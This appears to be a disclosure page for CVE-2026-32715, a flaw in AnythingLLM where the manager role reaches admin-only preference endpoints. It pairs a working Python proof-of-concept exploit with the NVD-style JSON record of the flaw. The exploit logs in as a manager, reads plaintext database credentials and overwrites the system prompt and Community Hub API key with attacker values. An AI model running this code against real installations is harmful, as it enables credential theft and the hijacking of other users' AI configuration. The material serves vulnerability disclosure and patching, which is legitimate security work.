CVE-2026-32715

import requests import json # CVE-2026-32715 PoC - AnythingLLM Privilege Bypass # Target: AnythingLLM <= 1.11.1 # Vulnerability: Manager role can access admin-only endpoints BASE_URL = "http://target-server:3001" # Step 1: Login as manager user def login_manager(username, password): """Authenticate as manager user to obtain session token""" login_url = f"{BASE_URL}/api/auth/login" data = { "email": username, "password": password } response = requests.post(login_url, json=data) if response.status_code == 200: return response.json().get('token') return None # Step 2: Access system preferences (should be admin-only) def access_system_preferences(token): """Exploit: Access admin-only system preferences as manager""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # This endpoint should require admin role but accepts manager prefs_url = f"{BASE_URL}/api/system-preferences" response = requests.get(prefs_url, headers=headers) return response.json() # Step 3: Read database credentials (exposed plaintext SQL credentials) def read_db_credentials(token): """Extract database credentials from preferences response""" prefs = access_system_preferences(token) # Look for database connection strings in response if 'data' in prefs: for item in prefs['data']: if 'database' in str(item).lower() or 'sql' in str(item).lower(): print(f"[+] Found sensitive data: {item}") return item return None # Step 4: Modify admin-only settings def modify_system_settings(token, settings): """Modify system prompt and API keys (admin-only settings)""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } modify_url = f"{BASE_URL}/api/system-preferences" response = requests.post(modify_url, headers=headers, json=settings) return response.status_code == 200 # Main execution if __name__ == "__main__": token = login_manager("[email protected]", "manager_password") if token: print("[+] Manager login successful") print("[*] Exploiting privilege bypass...") creds = read_db_credentials(token) if creds: print(f"[!] Database credentials exposed: {creds}") # Modify system prompt modify_system_settings(token, { "systemPrompt": "Malicious system prompt", "communityHubApiKey": "attacker-controlled-key" }) print("[+] System settings modified") else: print("[-] Authentication failed")

{"cve": {"id": "CVE-2026-32715", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:42.493", "lastModified": "2026-03-16T20:00:30.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. In 1.11.1 and earlier, The two generic system-preferences endpoints allow manager role access, while every other surface that touches the same settings is restricted to admin only. Because of this inconsistency, a manager can call the generic endpoints directly to read plaintext SQL database credentials and overwrite admin-only global settings such as the default system prompt and the Community Hub API key."}, {"lang": "es", "value": "AnythingLLM es una aplicación que convierte fragmentos de contenido en contexto que cualquier LLM puede usar como referencias durante el chat. En la versión 1.11.1 y anteriores, los dos puntos finales genéricos de preferencias del sistema permiten el acceso con rol de gerente, mientras que cualquier otra superficie que accede a la misma configuración está restringida solo a administradores. Debido a esta inconsistencia, un gerente puede llamar directamente a los puntos finales genéricos para leer credenciales de la base de datos SQL en texto plano y sobrescribir configuraciones globales solo para administradores, como el prompt del sistema predeterminado y la clave API del Community Hub."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.11.1", "matchCriteriaId": "384FD8C3-E046-493C-9996-8E3042229081"}]}]}], "references": [{"url": "https://github.com/Mintplex-Labs/anything-llm/commit/732eac6fa89f43288bbb65ecc6298ebcd96b7aeb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-wfq3-65gm-3g2p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-wfq3-65gm-3g2p", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}